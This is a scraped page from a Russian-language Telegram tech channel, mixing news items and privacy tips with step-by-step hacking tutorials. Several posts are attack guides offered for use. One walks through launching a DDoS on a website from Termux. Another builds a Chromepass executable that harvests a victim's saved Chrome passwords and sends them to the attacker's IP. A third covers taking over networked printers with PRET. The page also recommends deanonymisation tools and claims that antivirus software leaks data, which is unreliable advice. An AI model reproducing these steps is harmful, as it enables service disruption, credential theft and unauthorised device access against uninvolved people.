Эксплойт
1.97M subscribers
14.5K photos
6.88K videos
2 files
10.1K links
Главное медиа об интернет-культуре и технологиях.

Больше интересного на https://exploit.iss.onedia

Написать в редакцию: @exploitex_bot

Сотрудничество: @todaycast

РКН: https://clck.ru/3FjURF
Download Telegram
​​Умный гаджет ускоряет Wi-Fi в два раза

Устройство американских ученых позволило в лабораторных условиях не только увеличивать скорость Wi-Fi в несколько раз, но и увеличить расстояние его работы с 30 м до 45 м. При этом себестоимость такого устройства составляет всего $5.

Умное устройство представляет собой печатную плату размером 10 на 30 см, содержащую 48 небольших антенн. Эти антенны объединяют и отражают входящие сигналы WiFi от маршрутизатора или точки доступа, создавая совершенно новый путь для прохождения сигналов. Этот новый путь, или поток данных, так же силен, как и исходный путь от маршрутизатора или точки доступа.

Каждая антенна запрограммирована на настройку фазы входящего сигнала или радиоволны, которую она принимает. Так что все волны, отраженные от поверхности, имеют одинаковую фазу на приемнике. Эти волны затем сливаются в одну усиленную радиоволну. Пока неизвестно, собираются ли ученые запустить массовое производство этого устройства.
1👎1
​​Создаем DDoS атаку на сайт через Termux

1. Запускаем Termux и прописываем команды:
apt update & apt upgrade -y
pkg install python
2. Скачиваем репозиторий:
git clone https://github.com/HardyTomas/DDos-Attack-OVH-
3. Переходим в директорию:
cd DDos-Attack-OVH-
4. Устанавливаем пакеты:
pip3 install toripchanger
pip3 install -r requirements.txt
5. Запускаем программу:
python3 80port.py

После запуска программы, водим нужный сайт, те же настройки, как на первом скриншоте снизу. Затем программа начнет посылать запросы на сайт. Если на нем не установлена никакая защита от DDoS атак, то сайт перестанет функционировать через несколько минут. Проверьте свой сайт и установите защиту от DDoS атак, если потребуется. Не рекомендуем использовать эту информацию во вред.

#хакинг #termux
👎21
​​Как разархивировать архив онлайн

ZIP файлы представляют собой архив, состоящий из одного или нескольких сжатых файлов. Применение формата ZIP значительно облегчает отправку множества связанных цифровых данных одним пакетом, тем более что размер упакованных объектов становится значительно меньше.

Однако бывает, что у пользователя не установлен архиватор и открыть такой файл становится проблематично. Если вы один из тех, то следуйте руководству:

1. Перейдите на сайт unzip-online.com.
2. Нажмите кнопку «Uncompress files».
2. Кликните «Browse…».
3. Загрузите архивный файл
4. После загрузки архива щелкните «Uncompress file».

После чего через некоторое время, в зависимости от скорости работы интернет-подключения, появится ссылка для скачивания распакованного архива.
2
​​Хакеры взломали более 60 рекламных серверов, чтобы распространить вирус

Уже девять месяцев кряду (с августа 2019 года) неизвестная хак-группа взламывает рекламные серверы, чтобы внедрять свои вредоносные объявления на самые разные сайты.

Хакеры атакуют рекламные сети, использующие старые версии опенсорсного рекламного сервера Revive. Если атака удалась, злоумышленники добавляют к существующей рекламе свой вредоносный код, который перехватывает и перенаправляет их посетителей на вредоносные ресурсы, как правило, содержащие малварь, замаскированную под обновления Adobe Flash Player.

В итоге группировке удалось разместить вредоносную рекламу на тысячах сайтов, причем эти объявления транслируются и другим рекламным компаниям из-за RTB-интеграции между сервисами. То есть речь идет примерно о 1,25 млн показов рекламных объявлений в день для одного скомпрометированного RTB-сервера.

#новость
👍21
​​Как зашифровать записи, фото и архивы с помощью EncryptPad

EncryptPad — простое в использовании приложение, которое позволяет зашифровать текст, фотографии или архивы с помощью криптостойкого алгоритма шифрования, предоставляя доступ к зашифрованным данным с помощью пароля, файла ключа или их обоих.

1. Установите EncryptPad.
2. Откройте текстовый файл с помощью EncryptPad.
3. Кликните по значку шестеренки.
4. Настройте параметры шифрования.
5. Напишите какой нибудь текст в файл.
6. Кликните по кнопке «Шифрование».
7. Затем нажмите «Установить пароль».
8. Введите надёжный пароль.
9. Сохраните файл.

Чтобы открыть зашифрованный файл, откройте файл в EncryptPad. Затем введите пароль. EncryptPad не ограничивается шифрованием текстов. Точно также он может шифровать архивы и изображения.
1
​​Как скрыть свой номер при звонке на iPhone

Чтобы сделать анонимный звонок со своего номера телефона достаточно зайти в Настройки, далее выберите пункт Телефон и отключите опцию Показ номера (Show My Caller ID).

Теперь при звонке, вместо номера телефона на экране абонента будет высвечиваться No Caller ID или Неизвестный абонент. Также, если кто-то заблокировал ваш номер телефона, с помощью данного способа вы сможете до него дозвониться.

Важно понимать, скрытие номера не делает ваш звонок полностью анонимным. Сотрудники сотового оператора или агенты спецслужб все равно смогут узнать настоящий номер телефона.

#анонимность #iPhone
2
​​​​Скрываем секретные данные внутри изображения или аудио

Стеганография представляет собой искусство сокрытия информации прямо на виду. Проще говоря, передача секретной инфы при помощи картинок с котиками.

Steghide - консольная утилита позволяющая скрывать информацию методом стеганографии в графических или аудио файлах. Рассмотрим как его использовать:

| apt-get install steghide

Зашифровка файла:
| steghide embed -cf файл В КОТОРЫЙ шифруем -ef файл КОТОРЫЙ шифруем

Вводим пароль и подтверждение. Все готово!
Для просмотра информации о зашифрованном файле:

| steghide info ЗАШИФРОВАННЫЙ файл

#криптография
2
​​Набор утилит для деанонимизации в Termux

1. Скачиваем репозиторий:
git clone https://github.com/termux-lab/sherlock.git
2. Открываем директорию:
cd sherlock
3. Запускаем файл:
python3 install.py hello

После всех проделанных действий, у вас запускается программа, в которой множество функций, таких как: проверка по номеру телефона, по нику, IP адресу и другие.

Чтобы в последующем запускать утилиту, необходимо будет открыть ее папку и запустить одной буквой:
cd sherlock
s


#OSINT #termux
2
​​Чек-лист по анонимности в сети

Нет 100% безопасности и анонимности, если кому то очень понадобится до вас докопаться и для этого будут деньги и связи, то рано или поздно вас вычислят.

Но достаточно соблюдать эти простые меры безопасности, чтобы избавить себя от большинства проблем:

— Зашифруйте данные на носителях.
— Зашифруйте трафик через свой VPN.
— Используйте Google или Cloudflare DNS.
— Используйте VPS или виртуальную операционную систему при открытии подозрительных файлов и ссылок.
— Используйте Portable версии ПО.
— Чистите остаточные данные. Например, при помощи CCleaner Portable.
— Не используйте антивирусы. В 95% случаев, они сливают данные.
— Установите пароль на BIOS.
— Не используйте личные данные в социальных сетях: почта, фото, адрес, ФИО.
— Используйте левую сим-карту.
— Используйте разные пароли на сайтах.
— Используйте разные никнеймы.
— Не используйте WhatsApp и Viber.
— Для хранения паролей и логинов используйте менеджер.

Список будет пополняться, присылайте свои советы по анонимности нам в @exqbot.

#анонимность
1
​​CSI Linux — дистрибутив для кибер-расследований и OSINT

В начале этого года вышел в свет очередной линукс-дистрибутив для проведения кибер-расследований и OSINT под именем CSI Linux Investigator.

В данном дистрибутиве есть разделение виртуальных машин на три составляющие — непосредственно дистрибутив, шлюз TOR и SIEM-сборку. Также содержит программное обеспечение, необходимое для решения следующих задач: OSINT, Digital Forensics, Incident Response, Malware Analysis.

С точки зрения наполнения сборки софтом — с одной стороны есть все необходимое, с другой стороны — много лишнего программного обеспечения, которое пагубно влияет на размер дистрибутива.

Загрузить дистрибутив можно по ссылке с официального сайта https://csilinux.com/. Там же размещены обзорные гайды и мануалы по работе с дистрибутивом.

#OSINT
3
Как удаленно получить доступ к сохраненным паролям Chrome

Google Chrome используют 86% пользователей интернета. В нем хранится очень много полезной инфы о каждом пользователе.

Chromepass - это консольное приложение на Python, которое умеет добывать сохраненные пароли в Chrome. Требуется Python 3.6+.

Итак, в терминале:
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt
$ python create_server.py

Далее, выберите метод client.exe, введите свой IP. Включите сообщение об ошибке если нужно, и добавьте свое сообщение при необходимости.

Теперь подождите, пока исполняемые файлы будут готовы. Запустите client.exe. Файл server_ip.exe — должна получить жертва. После этого, в client.exe начинают появляться пароли, как показано на скрине.

#хакинг
2👍1
​​По России прошел ряд цифровых митингов

Пользователи Рунета в нескольких городах России устроили в "Яндекс.Картах" спонтанные массовые акции протеста, которые уже стали разгонять. Цифровые граждане пикетируют правительственные здания комментариями с различными лозунгами в «Яндекс.Картах».

Жители Ростова-на-Дону организовали виртуальный митинг в протест местным властям из-за режима самоизоляции. В приложении «Яндекс.Навигатор» у здания правительства области появились десятки комментариев с требованием ввести чрезвычайное положение или выплатить пособия. Кроме Ростова, «митинги на удалёнке» состоялась также в Москве и Красноярске, а вот в Екатеринбурге пикет «разогнали» - Яндекс удалил все лишние реплики.

«Чем платить ипотеку?», «хотим есть, что делать?», «дайте возможность работать» — такие комментарии оставляли пользователи «Яндекс.Навигатора».

#новость
2👍1
​​​​Как ''пробить'' по IP адресу с помощью Termux

1. Скачиваем репозиторий:
git clone https://github.com/maldevel/IPGeoLocation
2. Открываем директорию:
cd IPGeoLocation
3. Добавляем разрешение файлу:
chmod +x *
4. Устанавливаем требования:
pip install -r requirements.txt
5. Запускаем программу:
python ipgeolocation.py -t [IP адрес]

После ввода IP, мы получаем такую информацию как: Город, страна, широту - долготу, провайдер интернета, почтовый индекс и многое другое.

#OSINT #termux
1
​​Отправляем зашифрованные электронные письма с помощью Mailvelope

К сожалению, отправка писем через электронную почту в наше время небезопасна, а почтовые провайдеры не спешат реализовать функцию шифрования писем.

Удобное расширение Mailvelope для провайдеров электронной почты: Gmail, Yahoo и других обеспечивает шифрование писем на основе PGP. Оно позволяет отправлять зашифрованные письма, которые не сможет прочитать никто, кроме вас и получателя. Вам просто нужно зашифровать электронное письмо паролем и сообщить его получателю.

Шифрование происходит на стороне клиента, поэтому даже разработчики расширения не могут получить доступ к сообщениям. Расширение использует в работе JavaScript-реализацию стандарта OpenPGP, а исходный код программы открыт.

Mailvelope: Chrome | Firefox

#безопасность
2
​​Восьмилетняя девочка обошла родительский контроль на iPhone

Функция iOS под названием Screen Time призвана упростить жизнь родителям и дать им больше контроля над тем, что их ребенок делает с телефоном. В частности, она позволяет ограничивать или вовсе отключать на устройстве некоторые приложения.

По словам пользователя Reddit, его сестра воспользовалась iMessage App Store, чтобы получить доступ к приложениям, заблокированным через Screen Time.

Сам «хак» очень прост. Пользователь должен открыть iMessage, чтобы написать новое сообщение, а затем открыть iMessage App Store с панели управления. В iMessage App Store нужно ввести в поиск требуемое приложения (в случае девочки это был YouTube) и нажать на «Открыть». Приложение откроется как ни в чем не бывало, даже если оно было заблокировано с помощью Screen Time.

#новость
3
​​Как взломать принтер в локальной сети

Для того, чтобы перехватить управление беспроводным принтером, нам понадобиться подключиться к WiFi сети, в которой работает этот принтер. Данная утилита работает как на Kali linux, так и на Termux.

Установка:

apt update & apt upgrade
pip2 install colorama
git clone https://github.com/RUB-NDS/PRET
cd PRET
pip install colorama pysnmP

Далее, нам нужно будет узнать IP адрес нашего принтера, сделать это можно в настройках принтера или через программу WiFi Analyzer. Это приложение сканирует WiFi сеть и показывает, локальные IP устройств, которые к ней подключены.

Запускаем программу:
python2 pret.py (IP принтера) pjl

Если подключение успешно, то вам будет доступен ввод различных команд для управления принтером. Командой help можно посмотреть все доступные функции, среди которых: печать произвольного текста или файла, отображение текста на дисплее принтера, флуд печатью и многое другое.

#хакинг #IoT
4
​​Скачиваем все фото с инстаграм аккаунта с помощью Termux

Очень полезная программа, которая позволяет скачать сразу все фото из инстаграм аккаунта. По понятным причинам работает только для публичных аккаунтов.

1. Скачиваем нужные пакеты
apt update && apt upgrade && pkg install python
2. Скачиваем программу
pip install instaloader
3. Запускаем программу
instaloader profile имя_пользователя

Чтобы посмотреть скачанные фото, перекинем их в корневую директорию устройства.
cp -r имя_пользователя /sdcard

#termux
1
​​​​Получаем открытую информацию о сайте или IP-адресе

Главной ценностью информации является её оперативность и теперь вам не нужно открывать браузер, чтобы получить информацию о необходимом сайте или IP-адресе.

С помощью бота @whoisdombot можно узнать основную whois-информацию для доменного имени и IP-адреса, среди которой:

— Дата регистрации домена;
— Контактная информация владельца;
— Информация о доменном регистраторе;
— Дата окончания регистрации домена.

Также можно отправить боту IP адрес, например компьютера и узнать информацию о его провайдере и местонахождении с точностью до города.

#OSINT #telegram
🔥21
​​Как браузер может идентифицировать пользователя

Цифровой отпечаток устройства - это невероятно точный метод выявления уникальных браузеров и отслеживания онлайн-активности. Веб-сайты используют его для для сбора информации о типе и версии браузера, а также о вашей операционной системе, активных плагинах, часовом поясе, языке, разрешении экрана и других активных настройках.

Поначалу эти данные могут показаться общими и не помогут в идентификации одного конкретного человека. Тем не менее, вероятность того, что цифровой отпечаток у другого пользователя информация будет совпадать на 100%, весьма мала. Только 1 из 286 777 других браузеров будет иметь тот же отпечаток, что и вы.

Сайт https://amiunique.org поможет вам понять, на сколько уникален ваш цифровой отпечаток и какие параметры выдают вас среди других пользователей.

#анонимность
2
​​Как запутать своего интернет-провайдера через Termux

Всем давно известно, что провайдеры ведут логи и собирают информацию о том, какие сайты мы посещаем и когда мы это делаем.

Эта программа будет делать множество запрос в день на различные сайты с вашего IP, что может запутать провайдера, который пристально следит за вами.

1. Скачиваем нужные пакеты:
apt update && apt upgrade -y && apt install python git -y
2. Скачиваем зависимости:
pip install requests
3. Скачиваем репозиторий:
git clone https://github.com/1tayH/noisy.git
4. Открываем директорию:
cd noisy
5. Запускаем файл:
python noisy.py --config config.json

Опцианальные аргументы:
--log -l -> Настройка уровеня регистрации
--config -c -> Кастомный config файл
--timeout -t -> Время работаты сканера (в секундах)

#анонимность #termux
2